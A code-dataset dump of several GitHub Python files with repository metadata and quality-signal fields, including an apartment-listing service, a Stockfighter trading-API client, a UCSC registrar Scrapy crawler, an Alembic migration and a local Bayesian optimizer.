hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
bd7f5d02897acbff32966f7928ccfc825cfa419a
3,548
py
Python
apartmentbot/services/listing_service.py
sgarfield/ApartmentBot
327a47e879998fbb40bd26f84510467f4757d330
[ "MIT" ]
null
null
null
apartmentbot/services/listing_service.py
sgarfield/ApartmentBot
327a47e879998fbb40bd26f84510467f4757d330
[ "MIT" ]
null
null
null
apartmentbot/services/listing_service.py
sgarfield/ApartmentBot
327a47e879998fbb40bd26f84510467f4757d330
[ "MIT" ]
null
null
null
""" apartmentbot.services.listing_service """ import logging from dataclasses import dataclass from typing import List from dataclasses_json import dataclass_json from apartmentbot.geolocation.geolocation import distance_finder, neighborhood_locator, place_locator from apartmentbot.models import Listing, Place, Preferences from apartmentbot.sources.sources import sources from apartmentbot.repository.repository import listing_repository @dataclass_json @dataclass class ListingService: """ Class ListingService finds and saves apartment listings """ def find_listings(self, preferences: Preferences) -> List[Listing]: """ Finds all listings that match the set of apartment preferences :param preferences: A set of apartment preferences :return: A list of apartment listings (may return nothing) """ logging.info("Searching listings", extra={"preferences": preferences}) source_listings = self._search_sources(preferences) return self._match_additional(preferences, source_listings) def save_listing(self, listing: Listing): """ Stores listing in the database """ logging.info("Saving listing", extra={"listing": listing}) return listing_repository.add(listing) @staticmethod def _search_sources(preferences: Preferences): """ Returns listings from all available listing sites """ return [listings for source in sources for listings in source.get_results(preferences)] def _match_additional(self, preferences: Preferences, listings: List[Listing]) -> List[Listing]: """ Filters listings by optional additional preferences """ if not preferences.additional: return listings if preferences.additional.neighborhoods: listings = [listing for listing in listings if self._is_in_neighborhood(listing, preferences.additional.neighborhoods)] logging.debug('Neighborhood matches: %d', len(listings)) for place in preferences.additional.places: listings = [listing for listing in listings if self._is_near_place(listing, place.name, place.distance)] logging.debug('Place matches: %d', len(listings)) return 
listings @staticmethod def _is_in_neighborhood(listing: Listing, neighborhoods: List[str]) -> bool: """ Determines whether the listing is in a chosen neighborhood """ neighborhood = neighborhood_locator.find_neighborhood(latlng=listing.geotag) logging.debug("Listing neighborhood result: %s", neighborhood, extra={"listing_id": listing.id, "geotag": listing.geotag}) if neighborhood in neighborhoods: listing.neighborhood = neighborhood return True return False @staticmethod def _is_near_place(listing: Listing, place_name: str, max_distance: int) -> bool: """ Determines whether listing is within max_distance of some searchable place """ place = place_locator.find_place(place=place_name, latlng=listing.geotag) distance = distance_finder.find_distance(origin=listing.geotag, destination=place) logging.debug("Distance (meters) between listing and %s: %d", place_name, distance, extra={"listing_id": listing.id, "place_id": place, "geotag": listing.geotag}) if distance <= max_distance: listing.places.append(Place(place_name, distance)) return True return False
45.487179
101
0.698985
384
3,548
6.328125
0.255208
0.018519
0.021399
0.020576
0.054321
0.035391
0.035391
0.035391
0.035391
0
0
0
0.217587
3,548
77
102
46.077922
0.87536
0.152198
0
0.211538
0
0
0.070427
0
0
0
0
0
0
1
0.115385
false
0
0.153846
0
0.461538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd7f8e09909844b7662e6b08100c7c6fbbff9197
6,016
py
Python
stocky.py
Naphtha/stocky
04e51b4270b28a1aa23597c07d67a2a99e4710cf
[ "MIT" ]
null
null
null
stocky.py
Naphtha/stocky
04e51b4270b28a1aa23597c07d67a2a99e4710cf
[ "MIT" ]
null
null
null
stocky.py
Naphtha/stocky
04e51b4270b28a1aa23597c07d67a2a99e4710cf
[ "MIT" ]
null
null
null
import requests import json BASE_URL = "https://api.stockfighter.io/ob/api/" class StockMinion(object): '''Handles all API related requests for stock/order functionality''' def __init__(self, api_key, account, venue, stock): # use sessions to persist the HTTP connection # this will prevent thrashing HTTP sockets self.session = requests.Session() # set header in session, this will be reused by every function header = {'X-Starfighter-Authorization' : api_key} self.session.headers.update(header) # set some basic, usually static, values self.account = account self.venue = venue self.stock = stock def check_api(self): # _call_api is sufficiently general to handle all cases data = self._call_api(BASE_URL + 'heartbeat', 'get') return data def check_venue(self): venue = self.venue data = self._call_api(BASE_URL + 'venues/{0}/heartbeat'.format(venue), 'get') return data def get_stocks_on_venue(self): venue = self.venue data = self._call_api(BASE_URL + 'venues/{0}/stocks'.format(venue), 'get') return data def get_orderbook(self): venue = self.venue stock = self.stock data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}'.format(venue, stock), 'get') return data # using kwargs here allows me to call this function with keywords or with a dict def place_order(self, **kwargs): kwargs['account'] = self.account kwargs['stock'] = self.stock kwargs['venue'] = self.venue # the args we need to make the request of the API mandatory = ['account', 'venue', 'stock', 'qty', 'direction', 'orderType'] # filter out the args we're missing from the kwargs dict missing_args = [x for x in mandatory if x not in kwargs] # raises exception with missing operands if(missing_args): raise TypeError("Missing '{0}' arguments in function call".format(', '.join(missing_args))) # leave the dictionary packed request_body = kwargs data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders'.format(kwargs['venue'], kwargs['stock']), 'post', data=json.dumps(request_body)) return data def get_quote(self): 
venue = self.venue stock = self.stock data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/quote'.format(venue, stock), 'get') return data def get_order_status(self, id): venue = self.venue stock = self.stock data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders/{2}'.format(venue, stock, id), 'get') return data def cancel_order(self, id): venue = self.venue stock = self.stock data = self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders/{2}'.format(venue, stock, id), 'delete') return data def get_all_orders(self, stock = None): venue = self.venue account = self.account if(stock): # get orders for specific stock data = self._call_api(BASE_URL + 'venues/{0}/accounts/{1}/stocks/{2}/orders'.format(venue, account, stock), 'get') else: data = self._call_api(BASE_URL + 'venues/{0}/accounts/{1}/orders'.format(venue, account), 'get') return data def _call_api(self, url, verb, *args, **kwargs): # use HTTP verb argument to pick the method to use from the Session object func = getattr(self.session, verb) resp = func(url, *args, **kwargs) data = StockMinion._process_response(resp.text, resp.status_code) return data @staticmethod def _process_json(json_obj): try: data = json.loads(json_obj) except ValueError as e: data = {} print(e) return data @staticmethod def _process_status(code): if(code != 200): print("Got a status code of {0}".format(code)) else: pass @staticmethod def _process_response(json_obj, code): data = StockMinion._process_json(json_obj) StockMinion._process_status(code) return data if __name__ == '__main__': import sys def print_test_result(data, function): if(data['ok'] == True): print("PASS: {0}()".format(function)) else: print("FAIL: {1}()".format(function)) # run some simple regression tests TEST_VENUE = "TESTEX" TEST_STOCK = "FOOBAR" TEST_ACCOUNT = "EXB123456" # pick up api key from local untracked file with open('api.key', 'r') as secret_file: API_KEY = secret_file.readlines()[0].rstrip('\n') instance = StockMinion(API_KEY, TEST_ACCOUNT, 
TEST_VENUE, TEST_STOCK) data = instance.check_api() # the numerous calls to print_test_result can probably be eliminated at some point print_test_result(data, 'check_api') data = instance.check_venue() print_test_result(data, 'check_venue') data = instance.get_stocks_on_venue() print_test_result(data, 'get_stocks_on_venue') data = instance.get_orderbook() print_test_result(data, 'get_orderbook') data = instance.place_order(qty = 100, direction = "buy", orderType = "limit", price = 100) print_test_result(data, 'place_order') order_num = data['id'] data = instance.get_quote() print_test_result(data, 'get_quote') data = instance.get_order_status(order_num) print_test_result(data, 'get_order_status') data = instance.cancel_order(order_num) print_test_result(data, 'cancel_order') data = instance.get_all_orders() print_test_result(data, 'get_all_orders') data = instance.get_all_orders(TEST_STOCK) print_test_result(data, 'get_all_orders')
30.231156
126
0.617686
765
6,016
4.658824
0.245752
0.032828
0.050505
0.058642
0.297419
0.228676
0.191077
0.156846
0.156846
0.15376
0
0.008874
0.269448
6,016
198
127
30.383838
0.802048
0.134641
0
0.258333
0
0
0.132112
0.045902
0
0
0
0
0
1
0.125
false
0.016667
0.025
0
0.258333
0.125
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd8031a5c133b457ce688112eb2e76fc2cc5af7d
54
py
Python
test.py
periclescy/research-qre
7fafbc7120235fe6cb75a2f5477922d813c31066
[ "OLDAP-2.3" ]
null
null
null
test.py
periclescy/research-qre
7fafbc7120235fe6cb75a2f5477922d813c31066
[ "OLDAP-2.3" ]
null
null
null
test.py
periclescy/research-qre
7fafbc7120235fe6cb75a2f5477922d813c31066
[ "OLDAP-2.3" ]
null
null
null
for i in range(4): print(i) print("Hello world")
10.8
20
0.611111
10
54
3.3
0.8
0
0
0
0
0
0
0
0
0
0
0.02381
0.222222
54
4
21
13.5
0.761905
0
0
0
0
0
0.203704
0
0
0
0
0
0
1
0
false
0
0
0
0
0.666667
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
3
bd80d005cadf2946180d02a5ee8eb0ce0d0f3e91
6,481
py
Python
crawlers/ucsc_old/ucsc/spiders/registrar_courses.py
coursegraph/CourseGraph
9f05cd912b393ba14721411fe77f3856812c000f
[ "MIT" ]
5
2018-07-01T15:48:11.000Z
2020-07-31T17:06:10.000Z
crawlers/ucsc_old/ucsc/spiders/registrar_courses.py
coursegraph/CourseGraph
9f05cd912b393ba14721411fe77f3856812c000f
[ "MIT" ]
7
2018-07-09T21:17:19.000Z
2018-07-25T17:05:33.000Z
crawlers/ucsc_old/ucsc/spiders/registrar_courses.py
coursegraph/CourseGraph
9f05cd912b393ba14721411fe77f3856812c000f
[ "MIT" ]
4
2018-07-01T19:45:23.000Z
2019-03-17T21:12:03.000Z
# -*- coding: utf-8 -*- import scrapy import os from ucsc.items import FacultyItem, ProgramStatementItem, CourseDescriptionItem def path_components (path): if '://' in path: path = path.split('://')[1] parts = path.split('/') while parts and parts[0] == '': parts = parts[1:] while parts and parts[-1] == '': parts = parts[:-1] return parts assert(path_components('') == []) assert(path_components('/') == []) assert(path_components('foo/') == ['foo']) assert(path_components('/bar') == ['bar']) assert(path_components('foo/bar') == ['foo','bar']) def merge_url (url, rel): # note: blame seiji for all the issues with this code thing = url.split('://')[0] if '://' in url else 'https' if url and url[-1] == '/': url = path_components(url) else: url = path_components(url)[:-1] for part in path_components(rel): if part == '..': url = url[:-1] else: url.append(part) return thing + '://' + '/'.join(url) assert(merge_url('https://registrar.ucsc.edu/catalog/programs-courses/index.html', '../foo/bar/../baz.html') == 'https://registrar.ucsc.edu/catalog/foo/baz.html') assert(merge_url('', 'bar.baz') == 'https://bar.baz') assert(merge_url('https://foo/bar/baz.html', '') == 'https://foo/bar') registrar_base_url = 'https://registrar.ucsc.edu/catalog/programs-courses' base_course_description_url = 'https://registrar.ucsc.edu/catalog/programs-courses/course-descriptions' base_faculty_url = 'https://registrar.ucsc.edu/catalog/programs-courses/faculty' base_program_description_url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements' class RegistrarCoursesSpider(scrapy.Spider): name = 'registrar_courses' allowed_domains = ['registrar.ucsc.edu'] start_urls = [merge_url(registrar_base_url, 'index.html')] def __init__(self, *args, **kwargs): super(RegistrarCoursesSpider, self).__init__(*args, **kwargs) self.crawled = set() def parse (self, response): print("Parsing %s"%response.url) if base_course_description_url in response.url: yield self.parse_course_info(response) elif 
base_faculty_url in response.url: yield self.parse_faculty_info(response) elif base_program_description_url in response.url: yield self.parse_program_info(response) all_links = response.xpath('//a') for link in all_links: #print("Got link: %s"%link.extract()) try: href = link.xpath('@href').extract()[0] def is_local_url (url): for thing in ('http:','https:','C:','www','ucsc.edu'): if thing in url: return False return True url = merge_url(response.url, href) if is_local_url(href) else href if url in self.crawled: continue #print("Got URL: %s"%url) self.crawled.add(url) if registrar_base_url in url: yield { 'url': url } yield scrapy.Request(url, self.parse) else: pass #print("Skipping %s"%url) except IndexError: pass def parse_course_info (self, response): info = CourseDescriptionItem() info['url'] = response.url print("Got %s"%response.url) return info def parse_faculty_info (self, response): info = FacultyItem() info['url'] = response.url print("Got %s"%response.url) return info def parse_program_info (self, response): info = ProgramStatementItem() info['url'] = response.url print("Got %s"%response.url) return info class Unused: def parse(self, response): # Get links to all course pages from the registrar page_content = response\ .xpath('body/div[@id="wrap"]/div[@id="container"]/div[@id="content"]')\ .xpath('div[@id="sprflt"]/div[@id="main"]/div[contains(@class,"content")]') panel_elems = page_content.xpath('table/tbody/tr/td') self.depts = {} self.crawled = set() for panel in panel_elems: program_statements = panel.xpath('p/a') for a in program_statements: # print(a.xpath('@href').extract()) dept = a.xpath('@href').re(r'program-statements/(\w+)\.html')[0] title = a.xpath('text()').extract()[0] url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s.html'%dept self.depts[dept] = title self.crawled.add(url) yield scrapy.Request(url, callback=self.parse_program_info) #course_url = 
'https://registrar.ucsc.edu/catalog/programs-courses/course-descriptions/%s.html'%dept program_url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s.html'%dept faculty_url = 'https://registrar.ucsc.edu/catalog/programs-courses/faculty/%s.html'%dept #yield scrapy.Request(course_url, callback=self.parse_course_info) yield scrapy.Request(program_url, callback=self.parse_program_info) yield scrapy.Request(faculty_url, callback=self.parse_faculty_info) def parse_program_info (self, response): page_content = response\ .xpath('body/div[@id="wrap"]/div[@id="container"]/div[@id="content"]')\ .xpath('div[@id="sprflt"]/div[@id="main"]/div[contains(@class,"content")]') page_links = page_content.xpath('p[3]/a') for a in page_links: href, regex = a.xpath('@href'), r'\.\./([\w\-]+/\w+\.html)' try: page = href.re(regex)[0] title = a.xpath('text()').extract()[0] url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s'%page print("\n%s: %s"%(url, title)) except IndexError: print("Could not match '%s' with '%s'"%(href, regex)) content = page_content #print("%s"%content.extract()[0]) def parse_course_info (self, response): print("Got %s"%response.url) def parse_faculty_info (self, response): print("Got %s"%response.url)
39.760736
117
0.583552
773
6,481
4.767141
0.182406
0.024695
0.052103
0.062687
0.43772
0.409498
0.354138
0.330258
0.263501
0.257531
0
0.003558
0.262768
6,481
162
118
40.006173
0.767685
0.067428
0
0.314961
0
0.015748
0.217305
0.054036
0
0
0
0
0.062992
1
0.094488
false
0.015748
0.023622
0
0.212598
0.062992
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd82bc5f657a9986b7a9b6aa8522cff06f897b1e
9,528
py
Python
yui/migrations/versions/0e7bdd5c7473_refactor_datetime_fields.py
item4/yui
8628d0d54b94ada3cbe7d1b0f624063258bad10a
[ "MIT" ]
36
2017-06-12T01:09:46.000Z
2021-01-31T17:57:41.000Z
yui/migrations/versions/0e7bdd5c7473_refactor_datetime_fields.py
item4/yui
8628d0d54b94ada3cbe7d1b0f624063258bad10a
[ "MIT" ]
145
2017-06-21T13:31:29.000Z
2021-06-20T01:01:30.000Z
yui/migrations/versions/0e7bdd5c7473_refactor_datetime_fields.py
item4/yui
8628d0d54b94ada3cbe7d1b0f624063258bad10a
[ "MIT" ]
21
2017-07-24T15:53:19.000Z
2021-12-23T04:18:31.000Z
"""Refactor datetime fields Revision ID: 0e7bdd5c7473 Revises: Create Date: 2020-05-10 17:28:07.620112 """ import enum from alembic import op import sqlalchemy as sa from sqlalchemy_utils import ChoiceType from sqlalchemy_utils import URLType from yui.apps.info.toranoana.models import Stock from yui.apps.info.toranoana.models import Target from yui.orm.types import JSONType from yui.orm.types import TimezoneType # revision identifiers, used by Alembic. revision = '0e7bdd5c7473' down_revision = None branch_labels = None depends_on = None @enum.unique class Server(enum.IntEnum): pass def upgrade(): op.create_table( 'event_log', sa.Column('id', sa.Integer(), nullable=False), sa.Column('ts', sa.String(), nullable=False), sa.Column('channel', sa.String(), nullable=False), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'json_cache', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.Column('body', JSONType(), nullable=True), sa.Column( 'created_datetime', sa.DateTime(timezone=True), nullable=False ), sa.Column('created_timezone', TimezoneType(), nullable=True), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name'), ) op.create_table( 'memo', sa.Column('id', sa.Integer(), nullable=False), sa.Column('keyword', sa.String(), nullable=False), sa.Column('text', sa.Text(), nullable=False), sa.Column('author', sa.String(), nullable=False), sa.Column( 'created_datetime', sa.DateTime(timezone=True), nullable=False ), sa.Column('created_timezone', TimezoneType(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'rss_feed_url', sa.Column('id', sa.Integer(), nullable=False), sa.Column('url', sa.String(), nullable=False), sa.Column('channel', sa.String(), nullable=False), sa.Column( 'updated_datetime', sa.DateTime(timezone=True), nullable=False ), sa.Column('updated_timezone', TimezoneType(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'saomd_notice', sa.Column('id', sa.Integer(), 
nullable=False), sa.Column('notice_id', sa.Integer(), nullable=False), sa.Column( 'server', ChoiceType(Server, impl=sa.Integer()), nullable=False ), sa.Column('title', sa.String(), nullable=False), sa.Column('duration', sa.String(), nullable=True), sa.Column('short_description', sa.String(), nullable=True), sa.Column('is_deleted', sa.Boolean(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_author', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_character', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.Column('name_ko', sa.String(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_circle', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_coupling', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.Column('name_ko', sa.String(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_genre', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.Column('name_ko', sa.String(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_tag', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), nullable=False), sa.Column('name', sa.String(), nullable=False), sa.Column('name_ko', sa.String(), nullable=True), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_item', sa.Column('id', sa.Integer(), nullable=False), sa.Column('code', sa.String(), 
nullable=False), sa.Column('title', sa.String(), nullable=False), sa.Column('image_url', URLType(), nullable=False), sa.Column('price', sa.Integer(), nullable=False), sa.Column( 'stock', ChoiceType(Stock, impl=sa.Integer()), nullable=False ), sa.Column('genre_id', sa.Integer(), nullable=False), sa.Column( 'male_target', ChoiceType(Target, impl=sa.Integer()), nullable=False, ), sa.Column( 'female_target', ChoiceType(Target, impl=sa.Integer()), nullable=False, ), sa.Column( 'checked_datetime', sa.DateTime(timezone=True), nullable=False ), sa.Column('checked_timezone', TimezoneType(), nullable=True), sa.Column( 'updated_datetime', sa.DateTime(timezone=True), nullable=False ), sa.Column('updated_timezone', TimezoneType(), nullable=True), sa.Column('is_deleted', sa.Boolean(), nullable=False), sa.ForeignKeyConstraint( ['genre_id'], ['toranoana_genre.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('code'), ) op.create_table( 'toranoana_watch', sa.Column('id', sa.Integer(), nullable=False), sa.Column('print_target_id', sa.String(), nullable=False), sa.Column('genre_id', sa.Integer(), nullable=True), sa.Column( 'male', ChoiceType(Target, impl=sa.Integer()), nullable=False ), sa.Column( 'female', ChoiceType(Target, impl=sa.Integer()), nullable=False ), sa.ForeignKeyConstraint( ['genre_id'], ['toranoana_genre.id'], ), sa.PrimaryKeyConstraint('id'), ) op.create_table( 'toranoana_itemauthor', sa.Column('item_id', sa.Integer(), nullable=False), sa.Column('author_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint( ['author_id'], ['toranoana_author.id'], ), sa.ForeignKeyConstraint( ['item_id'], ['toranoana_item.id'], ), sa.PrimaryKeyConstraint('item_id', 'author_id'), ) op.create_table( 'toranoana_itemcharacter', sa.Column('item_id', sa.Integer(), nullable=False), sa.Column('character_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint( ['character_id'], ['toranoana_character.id'], ), sa.ForeignKeyConstraint( ['item_id'], ['toranoana_item.id'], ), 
sa.PrimaryKeyConstraint('item_id', 'character_id'), ) op.create_table( 'toranoana_itemcircle', sa.Column('item_id', sa.Integer(), nullable=False), sa.Column('circle_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint( ['circle_id'], ['toranoana_circle.id'], ), sa.ForeignKeyConstraint( ['item_id'], ['toranoana_item.id'], ), sa.PrimaryKeyConstraint('item_id', 'circle_id'), ) op.create_table( 'toranoana_itemcoupling', sa.Column('item_id', sa.Integer(), nullable=False), sa.Column('coupling_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint( ['coupling_id'], ['toranoana_coupling.id'], ), sa.ForeignKeyConstraint( ['item_id'], ['toranoana_item.id'], ), sa.PrimaryKeyConstraint('item_id', 'coupling_id'), ) op.create_table( 'toranoana_itemtag', sa.Column('item_id', sa.Integer(), nullable=False), sa.Column('tag_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint( ['item_id'], ['toranoana_item.id'], ), sa.ForeignKeyConstraint( ['tag_id'], ['toranoana_tag.id'], ), sa.PrimaryKeyConstraint('item_id', 'tag_id'), ) def downgrade(): op.drop_table('toranoana_itemtag') op.drop_table('toranoana_itemcoupling') op.drop_table('toranoana_itemcircle') op.drop_table('toranoana_itemcharacter') op.drop_table('toranoana_itemauthor') op.drop_table('toranoana_watch') op.drop_table('toranoana_item') op.drop_table('toranoana_tag') op.drop_table('toranoana_genre') op.drop_table('toranoana_coupling') op.drop_table('toranoana_circle') op.drop_table('toranoana_character') op.drop_table('toranoana_author') op.drop_table('saomd_notice') op.drop_table('rss_feed_url') op.drop_table('memo') op.drop_table('json_cache') op.drop_table('event_log')
33.787234
75
0.592149
1,025
9,528
5.361951
0.11122
0.112082
0.171943
0.202511
0.740721
0.695051
0.666667
0.598799
0.585335
0.497999
0
0.004755
0.24958
9,528
281
76
33.907473
0.763916
0.014694
0
0.547893
0
0
0.164179
0.014179
0
0
0
0
0
1
0.007663
false
0.003831
0.034483
0
0.045977
0.003831
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bd82c29e5bee15a3671a883151076960c6a72038
1,937
py
Python
gradient_free_optimizers/optimizers/exp_opt/local_bayes_opt.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
1
2022-02-25T03:14:48.000Z
2022-02-25T03:14:48.000Z
gradient_free_optimizers/optimizers/exp_opt/local_bayes_opt.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
null
null
null
gradient_free_optimizers/optimizers/exp_opt/local_bayes_opt.py
Wollala/Gradient-Free-Optimizers
8fb1608c264431b87f66fd2d233b76a0fa75316c
[ "MIT" ]
null
null
null
# Author: Simon Blanke # Email: simon.blanke@yahoo.com # License: MIT License import time import random import numpy as np from ..base_optimizer import BaseOptimizer from ...search import Search from ._sub_search_spaces import SubSearchSpaces from ..smb_opt import BayesianOptimizer class LocalBayesianOptimizer(BaseOptimizer, Search): name = "Local Bayesian Optimizer" def __init__( self, *args, max_size=300000, n_positions=20, local_range=100, **kwargs ): super().__init__(*args, **kwargs) self.max_size = max_size self.n_positions = n_positions self.local_range = local_range self.bayes_opt = BayesianOptimizer(self.conv.search_space) def create_local_smbo(self, current_position): local_ss = {} for idx, para in enumerate(self.conv.para_names): max_dim = max(0, current_position[idx] + self.local_range) min_dim = min( self.conv.dim_sizes[idx], current_position[idx] - self.local_range ) dim_pos = np.array(self.conv.search_space_positions[idx]) dim_pos_center = np.where( np.logical_and(dim_pos >= min_dim, dim_pos <= max_dim) )[0] local_ss[para] = dim_pos_center self.bayes_opt = BayesianOptimizer(local_ss) def finish_initialization(self): self.create_local_smbo(self.pos_current) @BaseOptimizer.track_nth_iter def iterate(self): pos_loc = self.bayes_opt.iterate() pos_new = self.bayes_opt.conv.position2value(pos_loc) return pos_new def evaluate(self, score_new): self.bayes_opt.evaluate(score_new) self.score_new = score_new self._evaluate_new2current(score_new) self._evaluate_current2best() modZero = self.nth_iter % self.n_positions == 0 if modZero: self.create_local_smbo(self.pos_current)
27.671429
82
0.665978
246
1,937
4.926829
0.341463
0.041254
0.049505
0.04703
0.107261
0.107261
0.054455
0
0
0
0
0.011636
0.245741
1,937
69
83
28.072464
0.817933
0.036655
0
0.044444
0
0
0.012889
0
0
0
0
0
0
1
0.111111
false
0
0.155556
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd83ed580ee241d7bccf7170f916c7c26cd0e7da
